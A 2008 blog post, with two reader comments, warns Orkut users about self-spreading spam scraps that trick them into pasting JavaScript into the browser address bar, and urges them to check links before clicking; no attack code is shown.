Monday, April 14, 2008

Orkut: Beware of Spammers and Click safely

Orkut, google's answer to Myspace and Facebook in the social networking arena, has recently got me really really frustrated. Orkut is a popular social network among Brazilians and Indians, who account for more than 80% of the site's traffic.
Coming from a company like google, one would expect high standards of security and privacy controls, but the recent exploits are sadly discouraging.

Orkut is overflowing with spam and XSS attacks. They seem like friendly scraps, which ask you to click on some links or paste some code on your browser address bar to see something cool. This runs a java script which gets access to your contacts and private data, and then rest is to left to the attackers creativity. One recent spam I received was like this

Now if you receive this from a really good friend, you would be excited to know, which girl he is referring to. So I clicked to see her profile. On her profile, she mentions of this mystery friend of hers and asks you to copy and run a code, to see his (her friend's) profile.

If you smart, you would have guessed, it's just another xss atack. If you are smarter, you would paste this on your address bar and look for the location of the javascript. This is what I found:

Open this javascript from a text editor, and you would figure out what this script really does..

For interested folks, this scraps all your friends with the exact message that you received. Sometimes it amuses me how people have so much spare time, to do such creative stuff.. and people like me have to write about them. But in retrospect, it's dangerous and I hope google does something to fix this. There can be far reaching implications like identity and credit card thefts. My suggestion to people, view the source/link of anything that you click on or you might regret that click, all your life. Play Safe and Click safe :)

Here is an interesting community that teaches and practices such exploits and bugs on orkut.. Bugs on Orkut


Anonymous said...

hey nice work man...i too am toubled by these XSS attacks ..i once accidentally choose to see the contents and have been on laert since then ..nice to put it on web..but not much people notice

Anonymous said...

I can safely bet the inventer of this spam would not have spent more time analysing his work than you .... kudos machan .. keep up the good work